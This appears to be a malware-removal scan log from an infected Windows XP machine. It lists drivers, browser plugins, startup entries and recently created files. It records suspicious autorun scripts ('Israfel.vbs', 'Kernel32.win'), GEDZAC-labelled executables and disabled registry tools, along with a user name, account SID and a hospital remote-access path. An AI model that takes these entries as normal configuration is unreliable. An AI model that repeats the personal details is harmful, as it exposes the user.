DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
DRV - File not found [Kernel | On_Demand | Stopped] -- C:\ComboFix\catchme.sys -- (catchme)
DRV - File not found [Kernel | On_Demand | Unknown] -- C:\DOCUME~1\Annie\LOCALS~1\Temp\aswMBR.sys -- (aswMBR)
DRV - [2012/01/25 17:21:53 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV - [2009/10/12 16:21:54 | 000,100,736 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ewusbdev.sys -- (hwusbdev)
DRV - [2009/09/10 15:55:52 | 000,102,528 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ewusbmdm.sys -- (hwdatacard)
DRV - [2009/05/06 18:15:38 | 001,759,744 | ---- | M] () [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\snp2uvc.sys -- (SNP2UVC) USB2.0 PC Camera (SNP2UVC)
DRV - [2009/03/02 01:03:48 | 000,038,912 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\l1c51x86.sys -- (L1c)
DRV - [2009/02/24 04:49:44 | 005,032,448 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
DRV - [2009/02/20 04:53:18 | 001,952,512 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\BCMWL5.SYS -- (BCM43XX)
DRV - [2009/02/03 02:42:30 | 000,162,816 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV - [2008/08/05 08:10:12 | 001,684,736 | ---- | M] (Creative) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Ambfilt.sys -- (Ambfilt)
DRV - [2006/11/02 09:27:36 | 000,020,112 | ---- | M] (Dritek System Inc.) [Kernel | System | Running] -- C:\Program Files\Launch Manager\DPortIO.sys -- (DritekPortIO)
DRV - [2006/01/04 03:41:48 | 001,389,056 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Monfilt.sys -- (Monfilt)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACGW_en
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
IE - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Wikipedia (en)"


FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\WINDOWS\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\1.3.21.111\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\1.3.21.111\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\html5video [2011/05/08 17:15:42 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{6904342A-8307-11DF-A508-4AE2DFD72085}: C:\Program Files\DivX\DivX Plus Web Player\firefox\wpa [2011/05/08 17:15:42 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011/11/11 11:22:11 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2012/05/10 18:40:14 | 000,000,000 | ---D | M]

[2011/05/06 01:03:37 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Annie\Application Data\Mozilla\Extensions
[2012/05/11 14:45:32 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\extensions
[2011/11/18 20:44:17 | 000,000,000 | ---D | M] (Browser Companion Helper) -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\extensions\bbrs_002@blabbers.com
[2011/11/18 19:46:55 | 000,002,314 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\searchplugins\Messenger Plus Smartbar Search.xml
[2011/11/18 19:53:32 | 000,002,770 | ---- | M] () -- C:\Documents and Settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\searchplugins\Plusnetwork.xml
[2012/05/10 18:40:15 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2012/05/10 20:29:45 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}
[2012/02/20 12:39:14 | 000,061,705 | ---- | M] () (No name found) -- C:\DOCUMENTS AND SETTINGS\ANNIE\APPLICATION DATA\MOZILLA\FIREFOX\PROFILES\LK3ZPUP6.DEFAULT\EXTENSIONS\{B749FC7C-E949-447F-926C-3F4EED6ACCFE}.XPI
[2012/01/06 13:15:35 | 000,634,964 | ---- | M] () (No name found) -- C:\DOCUMENTS AND SETTINGS\ANNIE\APPLICATION DATA\MOZILLA\FIREFOX\PROFILES\LK3ZPUP6.DEFAULT\EXTENSIONS\{D10D0BF8-F5B5-C8B4-A8B2-2B9879E08C5D}.XPI
[2011/11/11 11:22:09 | 000,134,104 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2011/05/18 19:03:07 | 000,472,808 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\mozilla firefox\plugins\npdeployJava1.dll
[2011/05/06 18:18:45 | 000,076,288 | ---- | M] (Foxit Software Company) -- C:\Program Files\mozilla firefox\plugins\npFoxitReaderPlugin.dll
[2011/10/10 23:53:49 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2011/11/11 11:22:10 | 000,002,040 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:searchFieldtrialParameter}{google:instantFieldTrialGroupParameter}sourceid=chrome&ie={inputEncoding}&q={searchTerms}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}{google:instantFieldTrialGroupParameter}client=chrome&hl={language}&q={searchTerms}
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\Application\18.0.1025.168\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\Application\18.0.1025.168\pdf.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\Application\18.0.1025.168\gcswf32.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
CHR - plugin: Java Deployment Toolkit 6.0.220.4 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll
CHR - plugin: Java™ Platform SE 6 U22 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll
CHR - plugin: Foxit Reader Plugin for Mozilla (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npFoxitReaderPlugin.dll
CHR - plugin: 2007 Microsoft Office system (Enabled) = C:\Program Files\Mozilla Firefox\plugins\NPOFF12.DLL
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npdrmv2.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npwmsdrm.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Program Files\Windows Media Player\npdsplay.dll
CHR - plugin: Facebook Video Calling Plugin (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll
CHR - plugin: Google Update (Enabled) = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\1.3.21.99\npGoogleUpdate3.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - plugin: Shockwave for Director (Enabled) = C:\WINDOWS\system32\Adobe\Director\np32dsw.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.0.61118.0\npctrl.dll
CHR - plugin: Default Plug-in (Enabled) = default_plugin
CHR - Extension: YouTube = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2_0\
CHR - Extension: Google Search = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.14_0\
CHR - Extension: DivX HiQ = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\fnjbmmemklcjgepojigaapkoodmkgbae\2.1.1.94_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo\u003E = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.1.94_0\
CHR - Extension: Gmail = C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\6.1.3_0\

O1 HOSTS File: ([2012/05/12 19:43:25 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (DivX HiQ) - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O4 - HKLM..\Run: [AllShareAgent] C:\Program Files\Samsung\AllShare\AllShareAgent.exe (Samsung Electronics Co., Ltd.)
O4 - HKLM..\Run: [AzMixerSel] C:\Program Files\Realtek\Audio\Drivers\AzMixerSel.exe (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [IAAnotif] C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe (Intel Corporation)
O4 - HKLM..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs ()
O4 - HKLM..\Run: [Kernel32] C:\WINDOWS\system32\Kernel32.win ()
O4 - HKLM..\Run: [LManager] C:\Program Files\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe ()
O4 - HKLM..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PLFSetL] C:\WINDOWS\PLFSetL.exe (sonix)
O4 - HKLM..\Run: [snp2uvc] C:\WINDOWS\System32\csnp2uvc.dll ( )
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [AttachmentWiperiportal.sickkids.ca] C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat ()
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [DAEMON Tools Lite] C:\Program Files\DAEMON Tools Lite\DTLite.exe (DT Soft Ltd)
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [Facebook Update] C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe (Lee-Soft.com)
O4 - Startup: C:\Documents and Settings\Annie\Start Menu\Programs\Startup\Dropbox.lnk = C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableRegistryTools = 1
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_D183CA64F05FDD98.dll/cmsidewiki.html File not found
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos-beta/OnlineScanner.cab (Reg Error: Key error.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3AA83E36-B133-4B6B-AE31-87EE5B48BB90}: DhcpNameServer = 192.168.2.1
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\Documents and Settings\Annie\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Annie\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2009/08/03 13:28:56 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O35 - HKU\S-1-5-21-1313911845-3924064129-568730901-1006..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

NetSvcs: 6to4 - File not found
NetSvcs: AppMgmt - %SystemRoot%\System32\appmgmts.dll File not found
NetSvcs: HidServ - %SystemRoot%\System32\hidserv.dll File not found
NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

MsConfig - StartUpReg: DivXUpdate - hkey= - key= - C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
MsConfig - StartUpReg: VideoWebCamera - hkey= - key= - C:\Program Files\VideoWebCamera\VideoWebCamera.exe (Suyin)
MsConfig - State: "system.ini" - 0
MsConfig - State: "win.ini" - 0
MsConfig - State: "bootini" - 0
MsConfig - State: "services" - 0
MsConfig - State: "startup" - 2

SafeBootMin: AppMgmt - %SystemRoot%\System32\appmgmts.dll File not found
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: sermouse.sys - Driver
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: vga.sys - Driver
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootNet: AppMgmt - %SystemRoot%\System32\appmgmts.dll File not found
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: hitmanpro35 - Reg Error: Value error.
SafeBootNet: hitmanpro35.sys - Reg Error: Value error.
SafeBootNet: HitmanPro35Crusader - Reg Error: Value error.
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: sermouse.sys - Driver
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TDI - Driver Group
SafeBootNet: vga.sys - Driver
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

========== Files/Folders - Created Within 90 Days ==========

[2012/05/13 11:16:32 | 000,000,000 | ---D | C] -- C:\Program Files\ESET
[2012/05/12 22:42:35 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2012/05/12 21:30:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Application Data\Samsung
[2012/05/12 21:30:23 | 000,000,000 | ---D | C] -- C:\Download
[2012/05/12 21:29:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\Samsung
[2012/05/12 21:29:51 | 000,000,000 | ---D | C] -- C:\AllShare
[2012/05/12 21:28:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Local Settings\Application Data\Downloaded Installations
[2012/05/12 20:31:27 | 000,030,721 | ---- | C] (GEDZAC) -- C:\WINDOWS\System32\sendi.exe
[2012/05/12 20:14:04 | 000,017,409 | ---- | C] (GEDZAC LABS) -- C:\WINDOWS\System32\regsrv.exe
[2012/05/12 19:47:11 | 000,000,000 | ---D | C] -- C:\WINDOWS\temp
[2012/05/12 13:42:05 | 000,000,000 | RHSD | C] -- C:\cmdcons
[2012/05/12 13:41:24 | 000,518,144 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2012/05/12 13:41:24 | 000,406,528 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2012/05/12 13:41:24 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2012/05/12 13:41:24 | 000,060,416 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2012/05/12 13:41:00 | 000,000,000 | R--D | C] -- C:\Documents and Settings\Annie\Start Menu\Programs\Administrative Tools
[2012/05/12 13:40:45 | 004,490,121 | R--- | C] (Swearware) -- C:\Documents and Settings\Annie\Desktop\ComboFix.exe
[2012/05/12 13:31:38 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2012/05/12 13:31:32 | 000,000,000 | ---D | C] -- C:\Qoobox
[2012/05/11 15:03:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Desktop\May 2012
[2012/05/11 09:16:49 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\QuickScan
[2012/05/10 20:29:50 | 000,000,000 | ---D | C] -- C:\Program Files\Java
[2012/05/10 20:29:42 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java
[2012/05/10 20:19:58 | 000,000,000 | ---D | C] -- C:\temp
[2012/05/10 20:19:46 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Atheros
[2012/05/10 20:15:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Broadcom
[2012/05/10 20:15:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Atheros_7.7.0.348_XPx86_A
[2012/05/10 20:14:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Desktop\Wireless LAN_Broadcom_5.10.79.14_XPx86_A
[2012/05/10 18:40:27 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java(2)
[2012/05/10 18:39:51 | 000,000,000 | ---D | C] -- C:\Program Files\Java(2)
[2012/05/10 13:15:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\FK_Monitor
